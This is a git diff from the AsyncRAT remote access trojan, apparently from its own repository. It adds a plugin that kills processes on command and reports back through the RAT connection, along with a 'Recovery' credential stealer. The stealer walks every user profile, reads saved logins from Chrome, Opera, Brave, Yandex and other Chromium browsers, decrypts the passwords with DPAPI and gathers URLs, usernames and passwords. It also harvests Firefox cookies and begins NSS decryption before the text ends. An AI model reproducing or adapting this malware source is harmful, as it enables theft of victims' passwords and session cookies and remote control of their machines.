+ else if (iVal <= -128) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD1);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= -32)
+ {
+ ms.WriteByte(0xD0);
+ ms.WriteByte((byte)iVal);
+ }
+ else
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ } // end <0
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleProcessManager.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Packet.cs
similarity index 66%
rename from AsyncRAT-C#/Client/Handle Packet/HandleProcessManager.cs
rename to AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Packet.cs
index cd316ff..46d51fa 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleProcessManager.cs
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Packet.cs
@@ -1,40 +1,50 @@
-using Client.MessagePack;
-using Client.Connection;
+using Plugin.MessagePack;
using System;
+using System.Collections.Generic;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Linq;
using System.Management;
+using System.Runtime.InteropServices;
using System.Text;
+using System.Threading;
-namespace Client.Handle_Packet
+namespace Plugin
{
+ public static class Packet
+ {
+ public static void Read(object data)
+ {
+ MsgPack unpack_msgpack = new MsgPack();
+ unpack_msgpack.DecodeFromBytes((byte[])data);
+ switch (unpack_msgpack.ForcePathObject("Packet").AsString)
+ {
+ case "processManager":
+ {
+ switch (unpack_msgpack.ForcePathObject("Option").AsString)
+ {
+ case "List":
+ {
+ new HandleProcessManager().ProcessList();
+ break;
+ }
+
+ case "Kill":
+ {
+ new HandleProcessManager().ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
+ break;
+ }
+ }
+ }
+ break;
+ }
+ }
+ }
+
public class HandleProcessManager
{
- public HandleProcessManager(MsgPack unpack_msgpack)
- {
- try
- {
- switch (unpack_msgpack.ForcePathObject("Option").AsString)
- {
- case "List":
- {
- ProcessList();
- break;
- }
-
- case "Kill":
- {
- ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
- break;
- }
- }
- }
- catch { }
- }
-
public void ProcessKill(int ID)
{
foreach (var process in Process.GetProcesses())
@@ -84,11 +94,13 @@ namespace Client.Handle_Packet
}
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "processManager";
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Message").AsString = sb.ToString();
- ClientSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
}
catch { }
}
}
+
}
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Plugin.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Plugin.cs
new file mode 100644
index 0000000..9fec2d9
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Plugin.cs
@@ -0,0 +1,33 @@
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public class Plugin
+ {
+ public static Socket Socket;
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ {
+ Debug.WriteLine("Plugin Invoked");
+ Socket = socket;
+ Connection.ServerCertificate = certificate;
+ Connection.Hwid = hwid;
+ new Thread(() =>
+ {
+ Connection.InitializeClient();
+ }).Start();
+
+ while (Connection.IsConnected)
+ {
+ Thread.Sleep(1000);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/ProcessManager.csproj b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/ProcessManager.csproj
new file mode 100644
index 0000000..b6aa5e1
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/ProcessManager.csproj
@@ -0,0 +1,56 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {D640C36B-2C66-449B-A145-EB98322A67C8}
+ Library
+ Properties
+ Plugin
+ ProcessManager
+ v4.0
+ 512
+ true
+
+
+ true
+ full
+ false
+ ..\..\..\Binaries\Debug\Plugins\
+ DEBUG;TRACE
+ prompt
+ 4
+
+
+ none
+ true
+ ..\..\..\Binaries\Release\Plugins\
+ TRACE
+ prompt
+ 4
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Properties/AssemblyInfo.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..4dd7aaa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+//[assembly: Guid("d640c36b-2c66-449b-a145-eb98322a67c8")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery.sln b/AsyncRAT-C#/Plugin/Recovery/Recovery.sln
new file mode 100644
index 0000000..e468233
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29123.88
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Recovery", "Recovery\Recovery.csproj", "{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {1C926148-C492-48B3-8F82-7EBB235A9866}
+ EndGlobalSection
+EndGlobal
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs
new file mode 100644
index 0000000..a982117
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs
@@ -0,0 +1,330 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Runtime.InteropServices;
+using System.Text;
+using Plugin.Browsers.Chromium;
+
+namespace Plugin.Browsers.Chromium
+{
+ public class Chromium
+ {
+
+ public void CookiesRecovery(StringBuilder Coocks)
+ {
+ try
+ {
+ foreach (string str in this.GetAppDataFolders())
+ {
+ try
+ {
+ string[] browser = {
+ str + "\\Local\\Google\\Chrome\\User Data\\Default\\Cookies",
+ str + "\\Roaming\\Opera Software\\Opera Stable\\Cookies",
+ str + "\\Local\\Vivaldi\\User Data\\Default\\Cookies",
+ str + "\\Local\\Chromium\\User Data\\Default\\Cookies",
+ str + "\\Local\\Torch\\User Data\\Default\\Cookies",
+ str + "\\Local\\Comodo\\Dragon\\User Data\\Default\\Cookies",
+ str + "\\Local\\Xpom\\User Data\\Default\\Cookies",
+ str + "\\Local\\Orbitum\\User Data\\Default\\Cookies",
+ str + "\\Local\\Kometa\\User Data\\Default\\Cookies",
+ str + "\\Local\\Amigo\\User Data\\Default\\Cookies",
+ str + "\\Local\\Nichrome\\User Data\\Default\\Cookies",
+ str + "\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Cookies",
+ str + "\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies",
+ str + "\\Local\\Blisk\\User Data\\Default\\Cookies"
+ };
+
+ int selected = 0;
+ foreach (string b in browser)
+ {
+ if (File.Exists(b))
+ {
+ SQLiteHandler sqliteHandler = new SQLiteHandler(b);
+ try
+ {
+ sqliteHandler.ReadTable("cookies");
+ }
+ catch
+ {
+ }
+
+ switch (selected)
+ {
+ case 0:
+ Coocks.Append("\rtf1\ansi\n\n== Chrome ==========\b0\n");
+ break;
+ case 1:
+ Coocks.Append("\n== Opera ===========\n");
+ break;
+ case 2:
+ Coocks.Append("\n== Vivaldi ===========\n");
+ break;
+ case 3:
+ Coocks.Append("\n== Chromium ===========\n");
+ break;
+ case 4:
+ Coocks.Append("\n== Torch ===========\n");
+ break;
+ case 5:
+ Coocks.Append("\n== Comodo ===========\n");
+ break;
+ case 6:
+ Coocks.Append("\n== Xpom ===========\n");
+ break;
+ case 7:
+ Coocks.Append("\n== Orbitum ===========\n");
+ break;
+ case 8:
+ Coocks.Append("\n== Kometa ===========\n");
+ break;
+ case 9:
+ Coocks.Append("\n== Amigo ===========\n");
+ break;
+ case 10:
+ Coocks.Append("\n== Nichrome ===========\n");
+ break;
+ case 11:
+ Coocks.Append("\n== Brave ===========\n");
+ break;
+ case 12:
+ Coocks.Append("\n== Yandex ===========\n");
+ break;
+ }
+
+ //List ffcs = ChromiumCookies.Cookies(b);
+ //foreach (ChromiumCookies.ChromiumCookie fcc in ffcs)
+ //{
+ // Coocks.Append(string.Concat(new string[]
+ // {
+ // fcc.ToString(),
+ // "\n\n",
+ // }));
+ //}
+ //Coocks.Append("\n");
+
+ }
+
+ selected++;
+ }
+ }
+ catch (Exception)
+ {
+ }
+ }
+ }
+ catch
+ {
+ }
+ }
+
+
+ public void Recovery(StringBuilder Pass)
+ {
+ try
+ {
+ foreach (string str in this.GetAppDataFolders())
+ {
+ try
+ {
+ string[] browser = {
+ str + "\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
+ str + "\\Roaming\\Opera Software\\Opera Stable\\Login Data",
+ str + "\\Local\\Vivaldi\\User Data\\Default\\Login Data",
+ str + "\\Local\\Chromium\\User Data\\Default\\Login Data",
+ str + "\\Local\\Torch\\User Data\\Default\\Login Data",
+ str + "\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data",
+ str + "\\Local\\Xpom\\User Data\\Default\\Login Data",
+ str + "\\Local\\Orbitum\\User Data\\Default\\Login Data",
+ str + "\\Local\\Kometa\\User Data\\Default\\Login Data",
+ str + "\\Local\\Amigo\\User Data\\Default\\Login Data",
+ str + "\\Local\\Nichrome\\User Data\\Default\\Login Data",
+ str + "\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data",
+ str + "\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data",
+ };
+
+ int selected = 0;
+ foreach (string b in browser)
+ {
+ if (File.Exists(b))
+ {
+ SQLiteHandler sqliteHandler = new SQLiteHandler(b);
+ try
+ {
+ sqliteHandler.ReadTable("logins");
+ }
+ catch
+ {
+ }
+
+ switch (selected)
+ {
+ case 0:
+ Pass.Append("\n== Chrome ==========\n");
+ break;
+ case 1:
+ Pass.Append("\n== Opera ===========\n");
+ break;
+ case 2:
+ Pass.Append("\n== Vivaldi ===========\n");
+ break;
+ case 3:
+ Pass.Append("\n== Chromium ===========\n");
+ break;
+ case 4:
+ Pass.Append("\n== Torch ===========\n");
+ break;
+ case 5:
+ Pass.Append("\n== Comodo ===========\n");
+ break;
+ case 6:
+ Pass.Append("\n== Xpom ===========\n");
+ break;
+ case 7:
+ Pass.Append("\n== Orbitum ===========\n");
+ break;
+ case 8:
+ Pass.Append("\n== Kometa ===========\n");
+ break;
+ case 9:
+ Pass.Append("\n== Amigo ===========\n");
+ break;
+ case 10:
+ Pass.Append("\n== Nichrome ===========\n");
+ break;
+ case 11:
+ Pass.Append("\n== Brave ===========\n");
+ break;
+ case 12:
+ Pass.Append("\n== Yandex ===========\n");
+ Pass.Append("Not Work for now!\n");
+ break;
+ }
+
+ for (int j = 0; j <= sqliteHandler.GetRowCount() - 1; j++)
+ {
+ string value = sqliteHandler.GetValue(j, "origin_url");
+ string value2 = sqliteHandler.GetValue(j, "username_value");
+ string value3 = sqliteHandler.GetValue(j, "password_value");
+ string text = string.Empty;
+ if (!string.IsNullOrEmpty(value3))
+ {
+ text = this.Decrypt(Encoding.Default.GetBytes(value3));
+ }
+ else
+ {
+ text = "";
+ }
+ Pass.Append(string.Concat(new string[]
+ {
+ value,
+ "\nU: ",
+ value2,
+ "\nP: ",
+ text,
+ "\n\n"
+ }));
+ }
+
+ }
+
+ selected++;
+ }
+ }
+ catch (Exception)
+ {
+ }
+ }
+ }
+ catch
+ {
+ }
+ }
+
+ private string Decrypt(byte[] Datas)
+ {
+ string result;
+ try
+ {
+ Chromium.DATA_BLOB data_BLOB = default(Chromium.DATA_BLOB);
+ Chromium.DATA_BLOB data_BLOB2 = default(Chromium.DATA_BLOB);
+ GCHandle gchandle = GCHandle.Alloc(Datas, GCHandleType.Pinned);
+ Chromium.DATA_BLOB data_BLOB3;
+ data_BLOB3.pbData = gchandle.AddrOfPinnedObject();
+ data_BLOB3.cbData = Datas.Length;
+ gchandle.Free();
+ Chromium.CRYPTPROTECT_PROMPTSTRUCT cryptprotect_PROMPTSTRUCT = default(Chromium.CRYPTPROTECT_PROMPTSTRUCT);
+ string empty = string.Empty;
+ Chromium.CryptUnprotectData(ref data_BLOB3, null, ref data_BLOB2, (IntPtr)0, ref cryptprotect_PROMPTSTRUCT, (Chromium.CryptProtectFlags)0, ref data_BLOB);
+ byte[] array = new byte[data_BLOB.cbData + 1];
+ Marshal.Copy(data_BLOB.pbData, array, 0, data_BLOB.cbData);
+ string @string = Encoding.UTF8.GetString(array);
+ result = @string.Substring(0, @string.Length - 1);
+ }
+ catch
+ {
+ result = "";
+ }
+ return result;
+ }
+
+ private string[] GetAppDataFolders()
+ {
+ List list = new List();
+ string[] directories = Directory.GetDirectories(Path.GetPathRoot(Environment.SystemDirectory) + "Users\\", "*", SearchOption.TopDirectoryOnly);
+ for (int i = 0; i < directories.Length; i++)
+ {
+ DirectoryInfo directoryInfo = new DirectoryInfo(directories[i]);
+ list.Add(Path.GetPathRoot(Environment.SystemDirectory) + "Users\\" + directoryInfo.Name + "\\AppData");
+ }
+ return list.ToArray();
+ }
+
+ [DllImport("Crypt32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+ [return: MarshalAs(UnmanagedType.Bool)]
+ private static extern bool CryptProtectData(ref Chromium.DATA_BLOB pDataIn, string szDataDescr, ref Chromium.DATA_BLOB pOptionalEntropy, IntPtr pvReserved, ref Chromium.CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, Chromium.CryptProtectFlags dwFlags, ref Chromium.DATA_BLOB pDataOut);
+
+ [DllImport("Crypt32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+ [return: MarshalAs(UnmanagedType.Bool)]
+ private static extern bool CryptUnprotectData(ref Chromium.DATA_BLOB pDataIn, StringBuilder szDataDescr, ref Chromium.DATA_BLOB pOptionalEntropy, IntPtr pvReserved, ref Chromium.CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, Chromium.CryptProtectFlags dwFlags, ref Chromium.DATA_BLOB pDataOut);
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+ private struct DATA_BLOB
+ {
+ public int cbData;
+
+ public IntPtr pbData;
+ }
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+ private struct CRYPTPROTECT_PROMPTSTRUCT
+ {
+ public int cbSize;
+
+ public Chromium.CryptProtectPromptFlags dwPromptFlags;
+
+ public IntPtr hwndApp;
+
+ public string szPrompt;
+ }
+
+ [Flags]
+ private enum CryptProtectPromptFlags
+ {
+ CRYPTPROTECT_PROMPT_ON_UNPROTECT = 1,
+ CRYPTPROTECT_PROMPT_ON_PROTECT = 2
+ }
+
+ [Flags]
+ private enum CryptProtectFlags
+ {
+ CRYPTPROTECT_UI_FORBIDDEN = 1,
+ CRYPTPROTECT_LOCAL_MACHINE = 4,
+ CRYPTPROTECT_CRED_SYNC = 8,
+ CRYPTPROTECT_AUDIT = 16,
+ CRYPTPROTECT_NO_RECOVERY = 32,
+ CRYPTPROTECT_VERIFY_PROTECTION = 64
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/ChromiumCookies.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/ChromiumCookies.cs
new file mode 100644
index 0000000..cb7fb19
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/ChromiumCookies.cs
@@ -0,0 +1,175 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Runtime.InteropServices;
+using System.Text;
+using Plugin.Browsers.Chromium;
+
+namespace Plugin.Browsers.Chromium
+{
+ public class ChromiumCookies
+ {
+
+ public class ChromiumCookie
+ {
+ public string Host { get; set; }
+ public string Name { get; set; }
+ public string Value { get; set; }
+ public string EncValue { get; set; }
+ public string Path { get; set; }
+ public DateTime ExpiresUTC { get; set; }
+ public bool Secure { get; set; }
+ public bool HttpOnly { get; set; }
+ public bool Expired { get; set; }
+
+ public override string ToString()
+ {
+ return string.Format("Host: {1}{0}Name: {2}{0}Value: {8}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}", Environment.NewLine, Host, Name, Value, Path, Expired, HttpOnly, Secure, EncValue);
+ }
+ }
+
+ private static DateTime FromUnixTime(long unixTime)
+ {
+ DateTime epoch = new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc);
+ return epoch.AddSeconds(unixTime);
+ }
+ private static long ToUnixTime(DateTime value)
+ {
+ TimeSpan span = (value - new DateTime(1970, 1, 1, 0, 0, 0, 0).ToLocalTime());
+ return (long)span.TotalSeconds;
+ }
+
+
+ public static List Cookies(string FileCookie)
+ {
+
+ List data = new List();
+ SQLiteHandler sql = new SQLiteHandler(FileCookie);
+ //if (!sql.ReadTable("cookies"))
+ //MessageBox.Show("Could not read Cookie Table");
+
+ int totalEntries = sql.GetRowCount();
+ for (int i = 0; i < totalEntries; i++)
+ {
+ try
+ {
+ string h = sql.GetValue(i, "host_key");
+ //Uri host = new Uri(h);
+ string name = sql.GetValue(i, "name");
+ string encval = sql.GetValue(i, "encrypted_value");
+ string val = Decrypt(Encoding.Default.GetBytes(encval));
+ string valu = sql.GetValue(i, "value");
+ string path = sql.GetValue(i, "path");
+
+
+ bool secure = sql.GetValue(i, "is_secure") == "0" ? false : true;
+ bool http = sql.GetValue(i, "is_httponly") == "0" ? false : true;
+
+ // if this fails we're in deep shit
+ long expiryTime = long.Parse(sql.GetValue(i, "expires_utc"));
+ long currentTime = ToUnixTime(DateTime.Now);
+ long convertedTime = (expiryTime - 11644473600000000) / 1000000;//divide by 1000000 because we are going to add Seconds on to the base date
+ DateTime date = new DateTime(1970, 1, 1, 0, 0, 0, 0);
+ date = date.AddSeconds(convertedTime);
+
+ DateTime exp = FromUnixTime(convertedTime);
+ bool expired = currentTime > convertedTime;
+
+
+
+ data.Add(new ChromiumCookie()
+ {
+ Host = h,
+ ExpiresUTC = exp,
+ Expired = expired,
+ Name = name,
+ EncValue = val,
+ Value = valu,
+ Path = path,
+ Secure = secure,
+ HttpOnly = http
+ });
+ }
+ catch (Exception)
+ {
+ return data;
+ }
+ }
+ return data;
+ }
+
+
+ private static string Decrypt(byte[] Datas)
+ {
+ string result;
+ try
+ {
+ DATA_BLOB data_BLOB = default(DATA_BLOB);
+ DATA_BLOB data_BLOB2 = default(DATA_BLOB);
+ GCHandle gchandle = GCHandle.Alloc(Datas, GCHandleType.Pinned);
+ DATA_BLOB data_BLOB3;
+ data_BLOB3.pbData = gchandle.AddrOfPinnedObject();
+ data_BLOB3.cbData = Datas.Length;
+ gchandle.Free();
+ CRYPTPROTECT_PROMPTSTRUCT cryptprotect_PROMPTSTRUCT = default(CRYPTPROTECT_PROMPTSTRUCT);
+ string empty = string.Empty;
+ CryptUnprotectData(ref data_BLOB3, null, ref data_BLOB2, (IntPtr)0, ref cryptprotect_PROMPTSTRUCT, (CryptProtectFlags)0, ref data_BLOB);
+ byte[] array = new byte[data_BLOB.cbData + 1];
+ Marshal.Copy(data_BLOB.pbData, array, 0, data_BLOB.cbData);
+ string @string = Encoding.UTF8.GetString(array);
+ result = @string.Substring(0, @string.Length - 1);
+ }
+ catch
+ {
+ result = "";
+ }
+ return result;
+ }
+ [DllImport("Crypt32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+ [return: MarshalAs(UnmanagedType.Bool)]
+ private static extern bool CryptProtectData(ref DATA_BLOB pDataIn, string szDataDescr, ref DATA_BLOB pOptionalEntropy, IntPtr pvReserved, ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, CryptProtectFlags dwFlags, ref DATA_BLOB pDataOut);
+
+ [DllImport("Crypt32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+ [return: MarshalAs(UnmanagedType.Bool)]
+ private static extern bool CryptUnprotectData(ref DATA_BLOB pDataIn, StringBuilder szDataDescr, ref DATA_BLOB pOptionalEntropy, IntPtr pvReserved, ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, CryptProtectFlags dwFlags, ref DATA_BLOB pDataOut);
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+ private struct DATA_BLOB
+ {
+ public int cbData;
+
+ public IntPtr pbData;
+ }
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+ private struct CRYPTPROTECT_PROMPTSTRUCT
+ {
+ public int cbSize;
+
+ public CryptProtectPromptFlags dwPromptFlags;
+
+ public IntPtr hwndApp;
+
+ public string szPrompt;
+ }
+
+ [Flags]
+ private enum CryptProtectPromptFlags
+ {
+ CRYPTPROTECT_PROMPT_ON_UNPROTECT = 1,
+ CRYPTPROTECT_PROMPT_ON_PROTECT = 2
+ }
+
+ [Flags]
+ private enum CryptProtectFlags
+ {
+ CRYPTPROTECT_UI_FORBIDDEN = 1,
+ CRYPTPROTECT_LOCAL_MACHINE = 4,
+ CRYPTPROTECT_CRED_SYNC = 8,
+ CRYPTPROTECT_AUDIT = 16,
+ CRYPTPROTECT_NO_RECOVERY = 32,
+ CRYPTPROTECT_VERIFY_PROTECTION = 64
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/CredentialModel.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/CredentialModel.cs
new file mode 100644
index 0000000..0cd93c0
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/CredentialModel.cs
@@ -0,0 +1,10 @@
+using System;
+namespace Plugin.Browsers
+{
+ public class CredentialModel
+ {
+ public string Url { get; set; }
+ public string Username { get; set; }
+ public string Password { get; set; }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Cookies/FFCookiesGrabber.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Cookies/FFCookiesGrabber.cs
new file mode 100644
index 0000000..8e9bf65
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Cookies/FFCookiesGrabber.cs
@@ -0,0 +1,131 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.Browsers.Firefox.Cookies
+{
+ public class FFCookiesGrabber
+ {
+ private static DirectoryInfo firefoxProfilePath;
+ private static FileInfo firefoxCookieFile;
+
+ private static void Init_Path()
+ {
+
+ firefoxProfilePath = GetProfilePath();
+ if (firefoxProfilePath == null)
+ throw new NullReferenceException("Firefox does not have any profiles, has it ever been launched?");
+
+ firefoxCookieFile = GetFile(firefoxProfilePath, "cookies.sqlite");
+ if (firefoxCookieFile == null)
+ throw new NullReferenceException("Firefox does not have any cookie file");
+
+ }
+
+
+ public static List Cookies()
+ {
+ Init_Path();
+ List data = new List();
+ SQLiteHandler sql = new SQLiteHandler(firefoxCookieFile.FullName);
+ if (!sql.ReadTable("moz_cookies"))
+ throw new Exception("Could not read cookie table");
+
+ int totalEntries = sql.GetRowCount();
+
+ for (int i = 0; i < totalEntries; i++)
+ {
+ try
+ {
+ string h = sql.GetValue(i, "host");
+ //Uri host = new Uri(h);
+ string name = sql.GetValue(i, "name");
+ string val = sql.GetValue(i, "value");
+ string path = sql.GetValue(i, "path");
+
+ bool secure = sql.GetValue(i, "isSecure") == "0" ? false : true;
+ bool http = sql.GetValue(i, "isSecure") == "0" ? false : true;
+
+ // if this fails we're in deep shit
+ long expiryTime = long.Parse(sql.GetValue(i, "expiry"));
+ long currentTime = ToUnixTime(DateTime.Now);
+ DateTime exp = FromUnixTime(expiryTime);
+ bool expired = currentTime > expiryTime;
+
+ data.Add(new FirefoxCookie()
+ {
+ Host = h,
+ ExpiresUTC = exp,
+ Expired = expired,
+ Name = name,
+ Value = val,
+ Path = path,
+ Secure = secure,
+ HttpOnly = http
+ });
+ }
+ catch (Exception)
+ {
+ return data;
+ }
+ }
+ return data;
+ }
+
+ private static DateTime FromUnixTime(long unixTime)
+ {
+ DateTime epoch = new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc);
+ return epoch.AddSeconds(unixTime);
+ }
+ private static long ToUnixTime(DateTime value)
+ {
+ TimeSpan span = (value - new DateTime(1970, 1, 1, 0, 0, 0, 0).ToLocalTime());
+ return (long)span.TotalSeconds;
+ }
+
+ private static FileInfo GetFile(DirectoryInfo profilePath, string searchTerm)
+ {
+ foreach (FileInfo file in profilePath.GetFiles(searchTerm))
+ {
+ return file;
+ }
+ throw new Exception("No Firefox logins.json was found");
+
+
+ }
+ private static DirectoryInfo GetProfilePath()
+ {
+ string raw = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Mozilla\Firefox\Profiles";
+ if (!Directory.Exists(raw))
+ throw new Exception("Firefox Application Data folder does not exist!");
+ DirectoryInfo profileDir = new DirectoryInfo(raw);
+
+ DirectoryInfo[] profiles = profileDir.GetDirectories();
+ if (profiles.Length == 0)
+ throw new IndexOutOfRangeException("No Firefox profiles could be found");
+
+ // return first profile, fuck it.
+ return profiles[0];
+
+ }
+ public class FirefoxCookie
+ {
+ public string Host { get; set; }
+ public string Name { get; set; }
+ public string Value { get; set; }
+ public string Path { get; set; }
+ public DateTime ExpiresUTC { get; set; }
+ public bool Secure { get; set; }
+ public bool HttpOnly { get; set; }
+ public bool Expired { get; set; }
+
+ public override string ToString()
+ {
+ return string.Format("Host: {1}{0}Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}", Environment.NewLine, Host, Name, Value, Path, Expired, HttpOnly, Secure);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/FFDecryptor.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/FFDecryptor.cs
new file mode 100644
index 0000000..b433624
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/FFDecryptor.cs
@@ -0,0 +1,101 @@
+using System;
+using System.IO;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace Plugin.Browsers.Firefox
+{
+ static class FFDecryptor
+ {
+ [DllImport("kernel32.dll")]
+ public static extern IntPtr LoadLibrary(string dllFilePath);
+ static IntPtr NSS3;
+ [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
+ public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
+ [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
+ public delegate long DLLFunctionDelegate(string configdir);
+ public static long NSS_Init(string configdir)
+ {
+ string str;
+ if (Directory.Exists("C:\\Program Files\\Mozilla Firefox"))
+ {
+ str = "C:\\Program Files\\Mozilla Firefox\\";
+ }
+ else if (Directory.Exists("C:\\Program Files (x86)\\Mozilla Firefox"))
+ {
+ str = "C:\\Program Files (x86)\\Mozilla Firefox\\";
+ }
+ else
+ {
